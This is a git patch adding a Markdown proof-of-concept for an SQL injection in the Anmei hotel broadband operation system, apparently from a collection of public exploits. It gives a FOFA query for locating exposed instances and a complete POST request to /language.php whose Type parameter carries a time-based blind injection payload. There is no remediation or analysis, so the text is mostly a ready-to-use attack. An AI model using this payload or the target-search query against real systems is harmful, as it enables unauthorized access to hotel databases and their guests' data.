From 463bf511a7479d52a0f17debd3d48ae2d57904b0 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 25 Oct 2023 20:57:03 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=AE=89=E7=BE=8E=E6=95=B0=E5=AD=97?=
 =?UTF-8?q?=E9=85=92=E5=BA=97=E5=AE=BD=E5=B8=A6=E8=BF=90=E8=90=A5=E7=B3=BB?=
 =?UTF-8?q?=E7=BB=9FSQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 安美数字酒店宽带运营系统SQL注入漏洞.md | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 安美数字酒店宽带运营系统SQL注入漏洞.md

diff --git a/安美数字酒店宽带运营系统SQL注入漏洞.md b/安美数字酒店宽带运营系统SQL注入漏洞.md
new file mode 100644
index 0000000..1a79bff
--- /dev/null
+++ b/安美数字酒店宽带运营系统SQL注入漏洞.md
@@ -0,0 +1,23 @@
+## 安美数字酒店宽带运营系统SQL注入漏洞
+
+
+## fofa
+```
+title=酒店宽带运营系统
+```
+
+## POC
+```
+POST /language.php HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Cookie: PHPSESSID=3n9dv7r0vl6fcvirnlvp2oh1t4; dashboroad=srgua4gv7d2jnichvtl66l1146
+Content-Length: 263
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate,br
+User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
+Host: 
+Connection: Keep-alive
+
+EditStatus=1&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5
+```